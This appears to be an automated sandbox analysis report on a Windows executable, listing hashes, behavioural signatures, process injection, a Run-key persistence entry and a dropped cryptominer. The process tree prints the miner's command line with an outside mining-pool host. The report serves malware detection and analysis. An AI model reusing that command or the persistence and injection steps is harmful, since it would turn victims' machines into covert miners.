Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12/10/2023, 16:06
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
Resource
win10v2004-20230915-en
General
-
Target
NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
-
Size
459KB
-
MD5
062ec9a8e7a9a0270d62f53a823518c0
-
SHA1
d933e3170faf6bf57013dfb71458a85c2ef0b609
-
SHA256
1f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33
-
SHA512
16a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395
-
SSDEEP
6144:n/n74zAQ3ZUdYF/GcxwJoQwni8DdpzxscQgYd8bNwUDxfkffsT/Wb9wR/AL+qf23:/74n3edYfiCwUOf0T/2O/Ax2CrU
Malware Config
Signatures
-
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000b000000012021-2.dat acprotect -
Executes dropped EXE 1 IoCs
pid Process 2532 minerd.exe -
Loads dropped DLL 5 IoCs
pid Process 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 2532 minerd.exe 2532 minerd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows\CurrentVersion\Run\WINSXS32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe" NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2020 set thread context of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2056 set thread context of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 set thread context of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 set thread context of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2612 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2020 wrote to memory of 2056 2020 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 28 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2612 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 29 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2604 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 30 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31 PID 2056 wrote to memory of 2532 2056 NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exeC:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exeC:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe3⤵
- Adds Run key to start application
PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\minerd.exeminerd.exe -a scrypt -s 20 -q -o zz.o247r.com:443 -u anonymous.1 -p -x3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2532
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
295KB
MD56aa2534bce88c87f81344c37c857f863
SHA15f3b3b559e1e2ae1a3947537e30c266134017f98
SHA2564c1a15de636720aece3b967ce599468eae8a67a2d3cb9e00aa308f2b9f10e74a
SHA512a7950f05cbe3a3163d1f383395e2c41c42321042df29b141c1243c31e47118362e0aea8a81ccc0f56ae14a0914f246e10ced9be193ca9f65bc90d12f9b86c33a
-
Filesize
459KB
MD5062ec9a8e7a9a0270d62f53a823518c0
SHA1d933e3170faf6bf57013dfb71458a85c2ef0b609
SHA2561f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33
SHA51216a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395
-
Filesize
459KB
MD5062ec9a8e7a9a0270d62f53a823518c0
SHA1d933e3170faf6bf57013dfb71458a85c2ef0b609
SHA2561f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33
SHA51216a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395
-
Filesize
70KB
MD5492153d3b3f0fb99abd48752c8d2e796
SHA1dae87bee3d82a812cf321d933945647c4a63d854
SHA2563866bdf85958e47ab3110884035a74469fabe2495cf3cc64194d390211e312f5
SHA5123e4ee410bef252ae25a9c1065af196a41979c612478a5897c009ca25d23e9d45b091ca7787f43946aceed537a97299e97519c8bba3e79ab84205eb196c46d515
-
Filesize
295KB
MD56aa2534bce88c87f81344c37c857f863
SHA15f3b3b559e1e2ae1a3947537e30c266134017f98
SHA2564c1a15de636720aece3b967ce599468eae8a67a2d3cb9e00aa308f2b9f10e74a
SHA512a7950f05cbe3a3163d1f383395e2c41c42321042df29b141c1243c31e47118362e0aea8a81ccc0f56ae14a0914f246e10ced9be193ca9f65bc90d12f9b86c33a
-
Filesize
459KB
MD5062ec9a8e7a9a0270d62f53a823518c0
SHA1d933e3170faf6bf57013dfb71458a85c2ef0b609
SHA2561f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33
SHA51216a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395
-
Filesize
459KB
MD5062ec9a8e7a9a0270d62f53a823518c0
SHA1d933e3170faf6bf57013dfb71458a85c2ef0b609
SHA2561f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33
SHA51216a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395
-
Filesize
70KB
MD5492153d3b3f0fb99abd48752c8d2e796
SHA1dae87bee3d82a812cf321d933945647c4a63d854
SHA2563866bdf85958e47ab3110884035a74469fabe2495cf3cc64194d390211e312f5
SHA5123e4ee410bef252ae25a9c1065af196a41979c612478a5897c009ca25d23e9d45b091ca7787f43946aceed537a97299e97519c8bba3e79ab84205eb196c46d515
-
Filesize
172KB
MD5685f1cbd4af30a1d0c25f252d399a666
SHA16a1b978f5e6150b88c8634146f1406ed97d2f134
SHA2560e478c95a7a07570a69e6061e7c1da9001bccad9cc454f2ed4da58824a13e0f4
SHA5126555ad6b4f4f26105ca8aad64501d74519a3e091f559b4b563d6ffb20a2ddfcde65e4fe94971a9bc65e86db577f2548ca00f9920d341c8ea808b04c0947d61d9